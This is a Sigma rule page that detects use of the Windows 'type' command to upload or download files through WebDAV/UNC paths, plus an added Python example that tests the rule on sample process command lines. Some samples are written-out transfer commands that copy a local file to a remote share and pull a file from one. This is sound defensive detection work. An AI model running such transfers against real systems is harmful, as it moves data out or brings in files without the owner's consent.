Potential Download/Upload Activity Using Type Command
Detects usage of the "type" command to download/upload data from WebDAV server
Sigma rule

```yaml
title: Potential Download/Upload Activity Using Type Command
id: aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f
status: test
description: Detects usage of the "type" command to download/upload data from WebDAV server
references:
    - https://mr0range.com/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-12-14
tags:
    - attack.command-and-control
    - attack.t1105
logsource:
    product: windows
    category: process_creation
detection:
    # Note: built-in CMD commands do not trigger a process creation event on their own,
    # so this is only detected when "type" is passed to a new cmd.exe via "/c".
    selection_upload:
        CommandLine|contains|all:
            - 'type '
            - ' > \\\\'
    selection_download:
        CommandLine|contains|all:
            - 'type \\\\'
            - ' > ' # Spaces are added to increase atom length and speed up matching. If your backend can handle this, remove the spaces.
    condition: 1 of selection_*
falsepositives:
    - Unknown
level: medium
```
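The two selections above are `contains|all` lists combined with `1 of selection_*`, so an event alerts when every substring of at least one selection appears in the command line. The following is an added example, not code from the Sigma project or the rule author, that evaluates that logic over a few constructed process-creation command lines; it assumes Sigma's default case-insensitive matching and reads the rule's `\\\\` as the two literal backslashes of a UNC prefix. The hostname, share and file names in the samples are made up.

```python
"""Added example (not part of the Sigma rule): evaluate the rule's selections over sample events."""

# Needles taken from the rule. Sigma's ' > \\\\' and 'type \\\\' denote two literal
# backslashes, i.e. the start of a UNC path such as \\host\share (assumption about
# Sigma escaping; Python's '\\\\' is likewise two backslashes).
SELECTION_UPLOAD = ["type ", " > \\\\"]      # local file redirected to a UNC target
SELECTION_DOWNLOAD = ["type \\\\", " > "]    # UNC source redirected to some target


def matches_all(command_line: str, needles: list) -> bool:
    """Sigma `contains|all`: every needle must occur; matching is case-insensitive."""
    haystack = command_line.lower()
    return all(needle.lower() in haystack for needle in needles)


def classify(command_line: str) -> list:
    """Return the names of the selections that fire; `condition: 1 of selection_*`
    is satisfied when the returned list is non-empty."""
    hits = []
    if matches_all(command_line, SELECTION_UPLOAD):
        hits.append("selection_upload")
    if matches_all(command_line, SELECTION_DOWNLOAD):
        hits.append("selection_download")
    return hits


def alerts(command_line: str) -> bool:
    """True when the rule would produce an alert for this command line."""
    return len(classify(command_line)) >= 1


# Constructed sample CommandLine values from process_creation events. Only the
# first two involve a UNC (WebDAV-style) path; the rest are ordinary local use of "type".
SAMPLE_EVENTS = [
    r"cmd.exe /c type C:\Users\Public\report.txt > \\203.0.113.5\webdav\report.txt",
    r"cmd.exe /c type \\203.0.113.5\webdav\update.txt > C:\Users\Public\update.txt",
    r"cmd.exe /c type C:\Windows\System32\drivers\etc\hosts",
    r"cmd.exe /c type readme.txt > out.txt",
]


def evaluate(events: list) -> dict:
    """Map each command line to the list of selections it matched."""
    return {event: classify(event) for event in events}


if __name__ == "__main__":
    for event, hits in evaluate(SAMPLE_EVENTS).items():
        print(f"{'ALERT ' if hits else 'ok    '} {hits or '-'}  {event}")
```

Note that the third and fourth samples still contain `type ` and even ` > `, but neither carries the UNC prefix required by one of the selections, which is why the rule's authors paired each redirection needle with a backslash-anchored one rather than alerting on `type` alone.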
Related rules
- AppX Package Installation Attempts Via AppInstaller.EXE
- Arbitrary File Download Via GfxDownloadWrapper.EXE
- Browser Execution In Headless Mode
- Cisco Stage Data
- Command Line Execution with Suspicious URL and AppData Strings